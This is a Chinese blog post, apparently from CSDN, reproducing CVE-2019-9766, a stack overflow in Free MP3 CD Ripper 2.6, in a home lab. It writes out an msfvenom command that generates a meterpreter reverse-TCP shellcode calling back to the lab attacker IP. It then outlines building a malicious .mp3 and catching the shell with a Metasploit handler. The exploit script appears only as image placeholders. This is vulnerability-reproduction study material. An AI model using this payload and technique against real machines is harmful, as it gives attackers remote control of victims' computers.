(CVE-2019-9766)Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞复现

漏洞简介:

Free MP3 CD Ripper是一款音频格式转换器。
Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

威胁类型

远程代码执行

威胁等级

漏洞编号

CVE-2019-9766
受影响系统及应用版本
Free MP3 CD Ripper 2.6

漏洞复现:

攻击机:kali2020 、kali2019
ip:192.168.6.146
受害机:win10
ip:192.168.6.142
安装Free MP3 CD Ripper 2.6版本

1、搭建环境

Win10下载安装Free MP3 CD Ripper 2.6版本
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用msf生成反向连接的shellcode

msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.6.146 lport = 888 -fc --smallest
在这里插入图片描述

替换脚本中的shellcode.

编写生成.Mp3文件的脚本

在这里插入图片描述

运行脚本,生成一个.MP3的文件

在这里插入图片描述
在这里插入图片描述

将生成的.mp3文件放到win10上(需要VMtools)

在这里插入图片描述

kali开启msfconsole

在这里插入图片描述

使用exploit/multi/handler模块
设置lhost,lport,攻击载荷
在这里插入图片描述

Kali开启监听:
在这里插入图片描述

Win10使用free MP3 CD ripper 打开mp3文件
在这里插入图片描述

弹回shell
在这里插入图片描述

执行命令

在这里插入图片描述

漏洞利用成功

PS:说一个我踩的坑吧,真的头一次遇到这种情况:

进攻利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样的情况的大佬分享一下经验吗。

2、修复建议v

及时更新Free MP3 CD Ripper到最新版本

参考链接:https : //blog.csdn.net/weixin_46132680/article/details/104366335

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值